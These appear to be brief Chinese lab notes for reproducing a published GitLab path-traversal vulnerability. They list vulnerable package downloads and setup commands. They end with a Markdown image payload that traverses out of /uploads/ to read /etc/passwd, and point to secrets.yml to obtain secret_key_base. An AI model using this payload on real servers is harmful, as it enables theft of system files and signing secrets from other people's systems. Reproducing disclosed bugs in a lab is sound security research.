参考:
https://hackerone.com/reports/827052
受影响版本下载:
https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb
wget --content-disposition https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb/download.deb
wget --content-disposition https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/focal/gitlab-ee_14.3.5-ee.0_amd64.deb/download.deb
sudo dpkg -i
然后启动:
sudo gitlab-ctl reconfigure
查看gitlab各个模块状态:
sudo gitlab-ctl status
sudo gitlab-ctl tail gitlab-rails
参考:
https://www.iteye.com/blog/hai0378-2366869
Demo
payload:
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
拿到secret_key_base
: